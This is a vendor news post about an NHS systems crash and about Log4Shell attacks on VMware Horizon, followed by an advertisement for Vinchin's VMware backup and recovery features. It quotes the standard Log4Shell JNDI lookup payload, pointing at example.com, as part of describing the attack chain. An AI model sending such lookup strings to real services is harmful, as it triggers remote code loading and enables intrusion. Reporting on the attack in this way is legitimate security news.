Vinchin News & Events
News List Systems crash after patch installation! Tips for complete VMware data protection

Systems crash after patch installation! Tips for complete VMware data protection

2022-01-21 | Vinchin Official

1642557344699161.png

Recently, 20 IT systems of UK’s National Health Services (NHS) crashed after a recommended update and security patch installation issued by an international software provider, which, an earlier business case indicates to be VMware. To recover the major systems, the IT team of NHS had tried to delete the patch but later found out the system data was lost along with it.

Just weeks before the incident, the digital security team of UK’s National Health Services (NHS) published a cyber alert warning of an unknown threat group exploiting vulnerabilities of Log4shell in VMware Horizon to spread malware for private information stealing, raising the public’s attention again on the issue of VMware data protection.

The threat group uses VMware Horizon’s built-in Apache Tomcat services to attack Log4Shell, starting from the simplest and extensively used payload ${jndi:ldap://example.com} to generate PowerShell command. After path retrieving and service being activated, malware will be eventually implanted in IT systems.

NHS,备份,恢复,还原,容灾,传统备份,数据,安全,数据归档,定时备份,实时备份PowerShell command generated by Tomcat

NHS,备份,恢复,还原,容灾,传统备份,数据,安全,数据归档,定时备份,实时备份

Cyberattack flow chart


With this vulnerability being used by more criminal groups, millions of global VMware users now are facing the potential risk of data loss. Spokesman from VMware placed that hackers would more likely to target online systems that’re not having the security patch updated, so it’s highly recommended to update the patch as early as possible.

For enterprise-grade VMware users, patch test before actual deployment is rather important, and it’s risky to do a patch installation for a large-scale IT environment without any preparation—especially without available backups of critical files. Building a solid backup architecture in advance can help users make the best use of virtualization, because even systems crash after improper operations, data can still be recovered with initial backups. In order to help VMware users to do this, Vinchin Backup & Recovery carries out VMware data protection plans with anti-ransomware and fast business recovery capability to prevent severe data loss incidents.

Vinchin Solutions

Backup Data Integrity Guarantee

Automated full VMware VM backup is one of the basic backup features in Vinchin Backup & Recovery, which guarantees the logic and integrity of data always in the right status. Restore points saving full backups can also be applied to create offsite backup copies and cloud archive data, meeting legal compliance requirements.

Instant VMware VM Recovery

Vinchin Backup & Recovery provides Instant VM Restore to quickly recover core business in a single VMware VM in less than 15 seconds. If major systems crash in the production environment, Instant VM Restore is able to guarantee business continuity by using backup data in the backup repository to immediately get a crashed virtual machine up running, and reboot applications.

Anti-ransomware Backups & Backup Storage

When processing a VMware VM backup, Vinchin Backup & Recovery can encrypt backup data during data transmission. Empowered by bank-level encryption algorithm, Vinchin Encrypted Backups technique can help eliminate the chance for hackers accessing any file in the backup chain even if they succeed on the backup interception. Combine this with Vinchin Backup Storage Protection, another anti-ransomware technique for unauthorized data modification prevention, all encrypted data can only be accessed by Vinchin backup server.

Preparing a well-founded backup and disaster recovery plan in advance is a universal security rule that works not only for VMware users, and the data loss risk caused by system updates and ransomware (or other malware) should both be fully considered when establishing the plan.

  • Tag:

60-DAY FULL-FEATURED FREE TRIAL

  • No credit card required
  • Get started in 10 minutes